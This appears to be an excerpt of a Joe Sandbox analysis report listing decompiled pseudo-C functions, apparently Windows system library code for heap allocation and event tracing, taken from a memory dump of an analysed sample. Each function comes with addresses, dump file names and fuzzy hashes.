				void* _t38;
				void* _t41;
				void* _t47;
				intOrPtr _t52;
				void* _t54;

				_push(_t38);
				_push(_t47);
				if(( *0x1d83391c & 0x00000004) == 0) {
					L12:
					_t16 = 0xc000000d;
				} else {
					_t52 = _a4;
					if( *((intOrPtr*)(_t52 + 4)) == 0) {
						_t18 = E1D785050(_t41,  &_v20, 0);
						goto L4;
					} else {
						_t36 = E1D78A690( *((intOrPtr*)(_t52 + 4)), 0x3b);
						_t60 = _t36;
						if(_t36 != 0) {
							goto L12;
						} else {
							_push( *((intOrPtr*)(_t52 + 4)));
							_push( &_v20);
							if(E1D7640F0(_t38, _t47, _t52, _t60) == 0) {
								_t16 = 0xc0000017;
							} else {
								L4:
								L1D752330(_t18, 0x1d8367d4);
								_t20 =  *0x1d836610; // 0x0
								_v16 = _t20;
								_t21 =  *0x1d836614; // 0x0
								_v12 = _t21;
								 *0x1d836610 = _v24;
								 *0x1d836614 = _v20;
								L1D752330(E1D7524D0(0x1d8367d4), 0x1d8367c4);
								_t26 = E1D77D532(0x1d834fe8);
								_t49 = _t26;
								_t54 = E1D77D532(0x1d834fe0);
								E1D7524D0(0x1d8367c4);
								E1D753B90( &_v28);
								if(_t26 != 0) {
									E1D753BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t49);
								}
								if(_t54 != 0) {
									E1D753BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t54);
								}
								_t16 = 1;
							}
						}
					}
				}
				return _t16;
			}






















                                                                                                                              0x1d77d462
                                                                                                                              0x1d77d464
                                                                                                                              0x1d77d465
                                                                                                                              0x1d7b8b5f
                                                                                                                              0x1d7b8b5f
                                                                                                                              0x1d77d46b
                                                                                                                              0x1d77d46b
                                                                                                                              0x1d77d472
                                                                                                                              0x1d7b8b3f
                                                                                                                              0x00000000
                                                                                                                              0x1d77d478
                                                                                                                              0x1d77d47d
                                                                                                                              0x1d77d484
                                                                                                                              0x1d77d486
                                                                                                                              0x00000000
                                                                                                                              0x1d77d48c
                                                                                                                              0x1d77d48c
                                                                                                                              0x1d77d493
                                                                                                                              0x1d77d49b
                                                                                                                              0x1d7b8b2e
                                                                                                                              0x1d77d4a1
                                                                                                                              0x1d77d4a1
                                                                                                                              0x1d77d4a7
                                                                                                                              0x1d77d4ac
                                                                                                                              0x1d77d4b1
                                                                                                                              0x1d77d4b5
                                                                                                                              0x1d77d4ba
                                                                                                                              0x1d77d4c2
                                                                                                                              0x1d77d4cc
                                                                                                                              0x1d77d4dc
                                                                                                                              0x1d77d4e6
                                                                                                                              0x1d77d4f0
                                                                                                                              0x1d77d4f8
                                                                                                                              0x1d77d4fa
                                                                                                                              0x1d77d504
                                                                                                                              0x1d77d50b
                                                                                                                              0x1d77d519
                                                                                                                              0x1d77d519
                                                                                                                              0x1d77d520
                                                                                                                              0x1d7b8b55
                                                                                                                              0x1d7b8b55
                                                                                                                              0x1d77d528
                                                                                                                              0x1d77d528
                                                                                                                              0x1d77d49b
                                                                                                                              0x1d77d486
                                                                                                                              0x1d77d472
                                                                                                                              0x1d77d52f

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 40c898e718f8e7668afc5dc8c9b7b2703e62c9733ef93421773a280398e1410f
                                                                                                                              • Instruction ID: 8b060e3f4a40a521ca8638d7d4737c673513bd32bae97ad118999c4b03b454ba
                                                                                                                              • Opcode Fuzzy Hash: 40c898e718f8e7668afc5dc8c9b7b2703e62c9733ef93421773a280398e1410f
                                                                                                                              • Instruction Fuzzy Hash: AF21D3BA548310ABCB11DB6CE989F1B77A8AB44678F410C15FA4897261E774E904CBE3
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D743CF0 Relevance: .1, Instructions: 84COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 85%
                                                                                                                              			E1D743CF0(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t36;
				intOrPtr _t45;
				signed int* _t47;
				void* _t52;
				signed int _t55;
				intOrPtr _t57;
				signed int _t60;
				void* _t61;

				_t58 = __esi;
				_push(0x18);
				_push(0x1d81bc60);
				E1D797BE4(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t61 - 0x1c)) = 0xc0000001;
				_t45 =  *((intOrPtr*)(_t61 + 0x14));
				if(_t45 != 0) {
					_t55 =  *(_t45 + 0x1c);
				} else {
					_t55 = 0;
				}
				_t47 =  *(_t61 + 8);
				if(_t47 == 0 ||  *((intOrPtr*)(_t61 + 0xc)) == 0 || (_t55 & 0xfffffffc) != 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					E1D814A6D(_t45, _t47, _t52, _t55, _t58);
					_t33 = 0xc000000d;
				} else {
					 *_t47 =  *_t47 & 0x00000000;
					_t36 =  *0x1d836644; // 0x0
					_t60 = E1D755D90(_t47,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t36 + 0x00200000 | 0x00000008, 0x90);
					 *(_t61 - 0x20) = _t60;
					 *(_t61 - 4) =  *(_t61 - 4) & 0x00000000;
					 *((intOrPtr*)(_t61 - 0x24)) = 1;
					_t71 = _t60;
					if(_t60 == 0) {
						_t57 = 0xc0000017;
						 *((intOrPtr*)(_t61 - 0x1c)) = 0xc0000017;
					} else {
						_t60 =  *(_t61 - 0x20);
						 *((intOrPtr*)(_t60 + 0x6c)) =  *((intOrPtr*)(_t61 + 4));
						_push(0x1d711080);
						_push(0x1d71114c);
						_push(_t55);
						_push(_t45);
						_t57 = E1D74496B(_t45, _t60, _t55, _t60, _t71);
						 *((intOrPtr*)(_t61 - 0x1c)) = _t57;
						if(_t57 >= 0) {
							_t40 =  *((intOrPtr*)(_t61 + 0xc));
							 *((intOrPtr*)(_t60 + 0x30)) =  *((intOrPtr*)(_t61 + 0xc));
							_t57 = 0;
							 *((intOrPtr*)(_t61 - 0x1c)) = 0;
							if(_t45 != 0) {
								_t40 =  *((intOrPtr*)(_t45 + 0x18));
								 *((intOrPtr*)(_t60 + 0x10)) =  *((intOrPtr*)(_t45 + 0x18));
							}
							_t74 =  *((intOrPtr*)(_t60 + 8)) - _t57;
							if( *((intOrPtr*)(_t60 + 8)) != _t57) {
								_t40 = E1D7773B3(_t45, _t60, _t57, _t60, _t74);
							}
						}
					}
					 *(_t61 - 4) = 0xfffffffe;
					 *((intOrPtr*)(_t61 - 0x24)) = 0;
					E1D743E01(_t40, _t57, _t60);
					if(_t57 >= 0) {
						 *( *(_t61 + 8)) = _t60;
					}
					_t33 = _t57;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t61 - 0x10));
				return _t33;
			}












                                                                                                                              0x1d743cf0
                                                                                                                              0x1d743cf0
                                                                                                                              0x1d743cf2
                                                                                                                              0x1d743cf7
                                                                                                                              0x1d743cfc
                                                                                                                              0x1d743d03
                                                                                                                              0x1d743d08
                                                                                                                              0x1d743df9
                                                                                                                              0x1d743d0e
                                                                                                                              0x1d743d0e
                                                                                                                              0x1d743d0e
                                                                                                                              0x1d743d10
                                                                                                                              0x1d743d15
                                                                                                                              0x1d79ffcc
                                                                                                                              0x1d79ffd1
                                                                                                                              0x1d743d44
                                                                                                                              0x1d743d44
                                                                                                                              0x1d743d47
                                                                                                                              0x1d743d68
                                                                                                                              0x1d743d6a
                                                                                                                              0x1d743d6d
                                                                                                                              0x1d743d71
                                                                                                                              0x1d743d78
                                                                                                                              0x1d743d7a
                                                                                                                              0x1d79ff88
                                                                                                                              0x1d79ff8d
                                                                                                                              0x1d743d80
                                                                                                                              0x1d743d83
                                                                                                                              0x1d743d86
                                                                                                                              0x1d743d89
                                                                                                                              0x1d743d8e
                                                                                                                              0x1d743d93
                                                                                                                              0x1d743d94
                                                                                                                              0x1d743d9f
                                                                                                                              0x1d743da1
                                                                                                                              0x1d743da6
                                                                                                                              0x1d743da8
                                                                                                                              0x1d743dab
                                                                                                                              0x1d743dae
                                                                                                                              0x1d743db0
                                                                                                                              0x1d743db5
                                                                                                                              0x1d743db7
                                                                                                                              0x1d743dba
                                                                                                                              0x1d743dba
                                                                                                                              0x1d743dbd
                                                                                                                              0x1d743dc0
                                                                                                                              0x1d743dc4
                                                                                                                              0x1d743dc4
                                                                                                                              0x1d743dc0
                                                                                                                              0x1d743da6
                                                                                                                              0x1d743dc9
                                                                                                                              0x1d743dd0
                                                                                                                              0x1d743dd7
                                                                                                                              0x1d743dde
                                                                                                                              0x1d743de3
                                                                                                                              0x1d743de3
                                                                                                                              0x1d743de5
                                                                                                                              0x1d743de5
                                                                                                                              0x1d743dea
                                                                                                                              0x1d743df6

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 2279eb22973c9e7b1390cef7a355bd878fe87ad1a3aca89f547fa2cf63970316
                                                                                                                              • Instruction ID: 5b3a80c72ae8ee9c14c14df32704bce5da6d1a6d2f1ee9dc63b82f8530f7cb7f
                                                                                                                              • Opcode Fuzzy Hash: 2279eb22973c9e7b1390cef7a355bd878fe87ad1a3aca89f547fa2cf63970316
                                                                                                                              • Instruction Fuzzy Hash: 3731EF76A00654DFCB02CF58D480BAAB7B1FF84734F21851AE819AB394C776E900CF92
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D753AF6 Relevance: .1, Instructions: 82COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 018846079d1b03eea3648ed9bbe335a88bcdcdf7e79ea02f75cf22683455daa9
                                                                                                                              • Instruction ID: 7a76317808d2e0159dc81ea8a8c1334e5d96baf439cfc9b082fee1e937205bd3
                                                                                                                              • Opcode Fuzzy Hash: 018846079d1b03eea3648ed9bbe335a88bcdcdf7e79ea02f75cf22683455daa9
                                                                                                                              • Instruction Fuzzy Hash: 6F21EF39301A82CFEB16CB2DC490B71B3E4FB41B34F04849BE886876A0D729DC81C663
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D7BFE1F Relevance: .1, Instructions: 78COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 77%
                                                                                                                              			E1D7BFE1F(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E1D753C40();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x1d835d78; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = E1D755D90(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E1D7888C0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E1D753C40() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E1D782F90();
						_t23 = E1D753BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}












                                                                                                                              0x1d7bfe1f
                                                                                                                              0x1d7bfe24
                                                                                                                              0x1d7bfe25
                                                                                                                              0x1d7bfe28
                                                                                                                              0x1d7bfe2a
                                                                                                                              0x1d7bfe2e
                                                                                                                              0x1d7bfe31
                                                                                                                              0x1d7bfe36
                                                                                                                              0x1d7bfe3d
                                                                                                                              0x1d7bfe4f
                                                                                                                              0x1d7bfe3f
                                                                                                                              0x1d7bfe48
                                                                                                                              0x1d7bfe48
                                                                                                                              0x1d7bfe54
                                                                                                                              0x1d7bfe5d
                                                                                                                              0x1d7bfe62
                                                                                                                              0x1d7bfe75
                                                                                                                              0x1d7bfe7a
                                                                                                                              0x1d7bfe7e
                                                                                                                              0x1d7bfe88
                                                                                                                              0x1d7bfe8e
                                                                                                                              0x1d7bfe94
                                                                                                                              0x1d7bfe9b
                                                                                                                              0x1d7bfea5
                                                                                                                              0x1d7bfea9
                                                                                                                              0x1d7bfebb
                                                                                                                              0x1d7bfec7
                                                                                                                              0x1d7bfed2
                                                                                                                              0x1d7bfed2
                                                                                                                              0x1d7bfed8
                                                                                                                              0x1d7bfedc
                                                                                                                              0x1d7bfee0
                                                                                                                              0x1d7bfee5
                                                                                                                              0x1d7bfee6
                                                                                                                              0x1d7bfef7
                                                                                                                              0x1d7bfef7
                                                                                                                              0x1d7bfe7e
                                                                                                                              0x1d7bff00

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 4f431413fdcaac50c0aa2c2927881fd0b665d69ee311129aaa596290d9dd73b1
                                                                                                                              • Instruction ID: d4497a747db68577f698f589f0aac1d42518815a54c975d6a5225f176a4c68ac
                                                                                                                              • Opcode Fuzzy Hash: 4f431413fdcaac50c0aa2c2927881fd0b665d69ee311129aaa596290d9dd73b1
                                                                                                                              • Instruction Fuzzy Hash: 4421DE76A00644AFD705CF68D884F2AB7F8FF48B60F11006AF904DB6A2D639ED00CB65
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D779580 Relevance: .1, Instructions: 78COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 63%
                                                                                                                              			E1D779580(void* __ebx, void* __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				void* __ebp;
				char* _t21;
				void* _t29;
				intOrPtr* _t31;
				intOrPtr _t33;
				void* _t34;
				void* _t35;
				intOrPtr _t37;
				void* _t47;

				_t35 = __edi;
				_t29 = __ebx;
				_push(__ecx);
				if(E1D753C40() != 0) {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				} else {
					_t21 = 0x7ffe0386;
				}
				_t37 = _a4;
				if( *_t21 != 0) {
					E1D815D65(_t37,  *((intOrPtr*)(_t37 + 0x20)),  *((intOrPtr*)(_t37 + 0x24)),  *((intOrPtr*)(_t37 + 0x34)));
				}
				if(_a8 == 0 && ( *(_t37 + 0x1c) & 0x000000c0) != 0) {
					_push(2);
					_pop(0);
				}
				_t31 =  *((intOrPtr*)(_t37 + 0x14));
				_t33 =  *0x1d836888; // 0x0
				if(_t31 == 0) {
					_t31 = _t33;
					if(0 == 0) {
						_t31 =  *0x1d836890; // 0x1ab07c0
					}
				}
				_t47 = _t31 -  *0x1d836890; // 0x1ab07c0
				if(_t47 != 0) {
					__eflags = _t31 - _t33;
					if(__eflags != 0) {
						_t24 = 0xffffffff;
						__eflags = 0xffffffff;
						asm("lock xadd [ecx], eax");
						if(0xffffffff == 0) {
							_t24 = E1D73B705(_t29, _t31, _t35, _t37, 0xffffffff);
						}
						L11:
						if( *((intOrPtr*)(_t37 + 0x18)) != 0) {
							_push( *((intOrPtr*)(_t37 + 0x18)));
							_t24 = E1D782A80();
						}
						if( *((intOrPtr*)(_t37 + 0x28)) != 0xffffffff) {
							E1D7426A0(_t24,  *((intOrPtr*)(_t37 + 0x28)));
						}
						if( *((intOrPtr*)(_t37 + 0x2c)) != 0) {
							E1D75CD80(_t31,  *((intOrPtr*)(_t37 + 0x2c)));
						}
						return E1D753BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t37);
					}
					_t34 = 0x1d83688c;
					_t31 = 0x1d836888;
					L10:
					_t24 = E1D742712(_t29, _t31, _t34, _t35, _t37, _t47);
					goto L11;
				}
				_t34 = 0x1d836894;
				_t31 = 0x1d836890;
				goto L10;
			}













                                                                                                                              0x1d779580
                                                                                                                              0x1d779580
                                                                                                                              0x1d779588
                                                                                                                              0x1d779591
                                                                                                                              0x1d7b5dbe
                                                                                                                              0x1d779597
                                                                                                                              0x1d779597
                                                                                                                              0x1d779597
                                                                                                                              0x1d77959f
                                                                                                                              0x1d7795a2
                                                                                                                              0x1d7b5dd3
                                                                                                                              0x1d7b5dd3
                                                                                                                              0x1d7795ad
                                                                                                                              0x1d77961f
                                                                                                                              0x1d779621
                                                                                                                              0x1d779621
                                                                                                                              0x1d7795b5
                                                                                                                              0x1d7795b8
                                                                                                                              0x1d7795c0
                                                                                                                              0x1d7795c2
                                                                                                                              0x1d7795c6
                                                                                                                              0x1d7795c8
                                                                                                                              0x1d7795c8
                                                                                                                              0x1d7795c6
                                                                                                                              0x1d7795ce
                                                                                                                              0x1d7795d4
                                                                                                                              0x1d7b5ddd
                                                                                                                              0x1d7b5ddf
                                                                                                                              0x1d7b5df0
                                                                                                                              0x1d7b5df0
                                                                                                                              0x1d7b5df3
                                                                                                                              0x1d7b5df7
                                                                                                                              0x1d7b5dfd
                                                                                                                              0x1d7b5dfd
                                                                                                                              0x1d7795e9
                                                                                                                              0x1d7795ed
                                                                                                                              0x1d7b5e07
                                                                                                                              0x1d7b5e0a
                                                                                                                              0x1d7b5e0a
                                                                                                                              0x1d7795f7
                                                                                                                              0x1d7b5e17
                                                                                                                              0x1d7b5e17
                                                                                                                              0x1d779601
                                                                                                                              0x1d7b5e24
                                                                                                                              0x1d7b5e24
                                                                                                                              0x1d77961c
                                                                                                                              0x1d77961c
                                                                                                                              0x1d7b5de1
                                                                                                                              0x1d7b5de6
                                                                                                                              0x1d7795e4
                                                                                                                              0x1d7795e4
                                                                                                                              0x00000000
                                                                                                                              0x1d7795e4
                                                                                                                              0x1d7795da
                                                                                                                              0x1d7795df
                                                                                                                              0x00000000

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: e1c0c8e80c05da12f2c98cd5212b6e143031765b92a58cf2e59b4bf6e7ec341b
                                                                                                                              • Instruction ID: dc43a661ff25fb1492c68473f73869a5abb4f0fcf7609a11a6961d1e5a7e43ad
                                                                                                                              • Opcode Fuzzy Hash: e1c0c8e80c05da12f2c98cd5212b6e143031765b92a58cf2e59b4bf6e7ec341b
                                                                                                                              • Instruction Fuzzy Hash: CD21C730105792EBCF365B29D88AB2677A1BF04634F104F1AE55E4A5E0D731F841CB93
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D81B781 Relevance: .1, Instructions: 77COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 68%
                                                                                                                              			E1D81B781(intOrPtr __ecx, intOrPtr __edx, intOrPtr* _a4, void* _a8, intOrPtr* _a12) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _t26;
				intOrPtr* _t32;
				intOrPtr* _t34;
				void* _t36;
				void* _t38;
				void* _t39;

				_v8 = _v8 & 0x00000000;
				_t32 = _a12;
				_v12 = __edx;
				_v16 = __ecx;
				if(_t32 != 0) {
					_t38 =  *_t32 + 0xc;
					_t36 = E1D755D90(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t38);
					if(_t36 != 0) {
						_t39 =  *0x1d717350(_v16, _v12, 2, _t36, _t38,  &_v8);
						if(_t39 < 0) {
							L12:
							if(_t39 == 0x80000005 || _t39 == 0xc0000023) {
								L14:
								_t39 = 0xc0000023;
								 *_t32 =  *((intOrPtr*)(_t36 + 8));
								goto L15;
							} else {
								L15:
								E1D753BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
								return _t39;
							}
						}
						_t26 =  *((intOrPtr*)(_t36 + 8));
						if(_t26 != 0) {
							if(_t26 >  *_t32) {
								goto L14;
							}
							 *_t32 = _t26;
							if(_a8 != 0) {
								_t12 = _t36 + 0xc; // 0xc
								E1D7888C0(_a8, _t12, _t26);
							}
							_t34 = _a4;
							if(_t34 != 0) {
								 *_t34 =  *((intOrPtr*)(_t36 + 4));
							}
							goto L12;
						}
						_t39 = 0xc000000d;
						goto L15;
					}
					return 0xc000009a;
				}
				return 0xc000000d;
			}












                                                                                                                              0x1d81b789
                                                                                                                              0x1d81b78e
                                                                                                                              0x1d81b791
                                                                                                                              0x1d81b794
                                                                                                                              0x1d81b79b
                                                                                                                              0x1d81b7af
                                                                                                                              0x1d81b7bd
                                                                                                                              0x1d81b7c1
                                                                                                                              0x1d81b7de
                                                                                                                              0x1d81b7e2
                                                                                                                              0x1d81b81a
                                                                                                                              0x1d81b820
                                                                                                                              0x1d81b82a
                                                                                                                              0x1d81b82d
                                                                                                                              0x1d81b832
                                                                                                                              0x00000000
                                                                                                                              0x1d81b834
                                                                                                                              0x1d81b834
                                                                                                                              0x1d81b840
                                                                                                                              0x00000000
                                                                                                                              0x1d81b845
                                                                                                                              0x1d81b820
                                                                                                                              0x1d81b7e4
                                                                                                                              0x1d81b7e9
                                                                                                                              0x1d81b7f4
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d81b7fa
                                                                                                                              0x1d81b7fc
                                                                                                                              0x1d81b7ff
                                                                                                                              0x1d81b806
                                                                                                                              0x1d81b80b
                                                                                                                              0x1d81b80e
                                                                                                                              0x1d81b813
                                                                                                                              0x1d81b818
                                                                                                                              0x1d81b818
                                                                                                                              0x00000000
                                                                                                                              0x1d81b813
                                                                                                                              0x1d81b7eb
                                                                                                                              0x00000000
                                                                                                                              0x1d81b7eb
                                                                                                                              0x00000000
                                                                                                                              0x1d81b7c3
                                                                                                                              0x00000000

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 95ae2c8794d5394954b160298a40371e8b02771931553f9c0ef267bac2288e66
                                                                                                                              • Instruction ID: 562c63cb2a440dbf1d87a3c3134477619c2f8f1e6a6a436da54d322f63ee85d1
                                                                                                                              • Opcode Fuzzy Hash: 95ae2c8794d5394954b160298a40371e8b02771931553f9c0ef267bac2288e66
                                                                                                                              • Instruction Fuzzy Hash: 8821C176A00255EFDB118F5AC884F5ABBB4FF46BA0F028064F9089B210D234FD48CB92
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D781ED8 Relevance: .1, Instructions: 75COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 84%
                                                                                                                              			E1D781ED8(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				void* _t55;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				signed int _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				signed int _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					__eflags =  *((intOrPtr*)(_t72 + 0xc)) - _t57;
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L11:
						_t72 =  *_t72;
						continue;
					}
					_t18 = _t72 + 0x10; // 0x10
					_t55 = E1D798050(_t18, _t65, _t57);
					__eflags = _t55 - _t57;
					if(_t55 != _t57) {
						_t65 = _v8;
						goto L11;
					}
					return 0xb7;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E1D77457E(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = E1D755D90(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E1D7888C0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E1D74DE20(_t62, __eflags, _t71, 1, 6,  &_v36);
					__eflags = _t63;
					if(_t63 == 0) {
						L24:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					__eflags = _t45 - _t58;
					if(_t45 < _t58) {
						goto L24;
					}
					_t69 = _t45 / _t58;
					__eflags = _t69;
					if(_t69 == 0) {
						L23:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						__eflags =  *((intOrPtr*)(_t63 + 0xc)) - 2;
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L22;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						__eflags =  *_t49 - 0x53445352;
						if( *_t49 != 0x53445352) {
							goto L22;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						__eflags = 0;
						return 0;
						L22:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
						__eflags = _t74 - _t69;
					} while (_t74 < _t69);
					goto L23;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}



























                                                                                                                              0x1d781ed8
                                                                                                                              0x1d781ee1
                                                                                                                              0x1d781ee4
                                                                                                                              0x1d781ee8
